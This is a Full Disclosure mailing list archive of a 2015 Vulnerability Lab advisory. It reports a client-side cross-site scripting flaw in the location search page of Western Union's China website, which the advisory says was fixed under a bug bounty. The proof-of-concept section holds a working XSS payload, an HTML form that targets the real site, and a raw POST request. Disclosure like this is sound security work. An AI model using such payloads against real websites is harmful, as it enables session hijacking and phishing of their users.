Full Disclosure mailing list archives

Western Union CN Bug Bounty #6 - Client Side Cross Site Scripting Web Vulnerability


From: Vulnerability Lab <research () vulnerability-lab com>
Date: Tue, 22 Dec 2015 15:53:54 +0100

Document Title:
===============
Western Union CN Bug Bounty #6 - Client Side Cross Site Scripting Web Vulnerability


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1657


Release Date:
=============
2015-12-14


Vulnerability Laboratory ID (VL-ID):
====================================
1658


Common Vulnerability Scoring System:
====================================
3.2


Product & Service Introduction:
===============================
The Western Union Company is an American financial services and communications company. Its North American headquarters 
is in Meridian, Colorado, 
though the postal designation of nearby Englewood is used in its mailing address. Up until it discontinued the service 
in 2006, Western Union was 
the best-known U.S. company in the business of exchanging telegrams.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Western_Union )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a client-side cross site scripting web vulnerability in the 
official Western Union China web-application.


Vulnerability Disclosure Timeline:
==================================
25-11-2015 : Reported
25-11-2015 : Report Validate
14-12-2015 : Fixed and Bounty Awarded 


Discovery Status:
=================
Published


Affected Product(s):
====================
Western Union Company
Product: Western Union - Web Application (Locations) 2015 Q4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
A POST inject web vulnerability has been discovered in the official Western Union Union online service web-application.
A vulnerability allows remote attackers to inject malicious script codes on the client-side of the affected 
web-application.

The vulnerability is located in the `page` value of the `location_search.php` file. Remote attackers are able to inject 
own 
malicious script codes to the client-side of the affected web-application. The request method to inject is POST and the 
attack 
vector is client-side. The attacker inject the payload in the page value to execute the code in the results page of the 
location 
search module. 

The security risk of the client-side web vulnerability is estimated as medium with a cvss (common vulnerability scoring 
system) count of 3.2. 
Exploitation of the non-persistent web vulnerability requires a no privilege web-application user account and low or 
medium user interaction. 
Successful exploitation results in session hijacking, persistent phishings attacks, persistent external redirect and 
malware loads or persistent 
manipulation of affected or connected module context.

Request Method(s):
                                        [+] POST

Vulnerable Module(s):
                                        [+] Location Search

Vulnerable Parameter(s):
                                        [+] page

Affected Domain(s):
                                        [+] location_search.php


Proof of Concept (PoC):
=======================
The cross site scripting web vulnerability can be exploited by remote attackers without privilege web-application user 
account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to 
continue.

Affected domain, path & file:  
http://www.westernunion.cn/en/location_search.php

PoC Payload:   
<--`<img/src=` onerror=alert(document.domain)> --!>

Affected parameter:
page


PoC: html
<html><body> 
<form action="http://westernunion.cn/en/location_search.php"; method="POST"> 
<input type="hidden" name="page" value="1<--`<img/src=` onerror=alert(document.domain)> --!>" /> 
<input type="hidden" name="province" value="SHAANXI" /> 
<input type="hidden" name="city_backup" value="" /> 
<input type="hidden" name="city" value="SHANGLUO" /> 
<input type="hidden" name="district" value="" /> 
<input type="hidden" name="location" value="AGRICULTURAL BANK OF CHINA" /> 
<input type="hidden" name="payout" value="USD" /> 
<input type="hidden" name="search_keyword" value="" /> 
<input type="submit" value="Submit request" /> 
</form> 
</body> 
</html>


--- PoC HTTP REQUEST Session Logs ---
POST /en/location_search.php HTTP/1.1 
Host: westernunion.cn 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Cookie: __utma=11880754.2028102378.1448438929.1448438929.1448438929.1; __utmb=11880754.9.10.1448438929; 
__utmz=11880754.1448438929.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none) 
Connection: keep-alive 
Content-Type: application/x-www-form-urlencoded 
Content-Length: 198
page=1%3C--%60%3Cimg%2Fsrc%3D%60+onerror%3Dalert%28document.domain%29%3E+--%21%3E&province=SHAANXI&city_backup=&city=SHANGLUO&district=&location=AGRICULTURAL+BAN


Reference(s):
http://www.westernunion.cn/
http://www.westernunion.cn/en/
http://www.westernunion.cn/en/location_search.php


Security Risk:
==============
The security risk of the client-side cross site scripting web vulnerability in the chinese wester union bank 
web-application is estimated as medium. (CVSS 3.2)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Milan Solanki [milans812 () gmail com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all 
warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or 
its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special 
damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or 
limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody 
to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                                      - 
www.evolution-sec.com
Contact:    admin () vulnerability-lab com      - research () vulnerability-lab com                     - admin () 
evolution-sec com
Section:    magazine.vulnerability-db.com       - vulnerability-lab.com/contact.php                     - 
evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                         - 
youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php            - 
vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    - vulnerability-lab.com/list-of-bug-bounty-programs.php - 
vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability 
Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit 
our material contact 
(admin () vulnerability-lab com or research () vulnerability-lab com) to get a permission.

                                Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™



-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com
PGP KEY: http://www.vulnerability-lab.com/keys/admin () vulnerability-lab com%280x198E9928%29.txt



_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Current thread: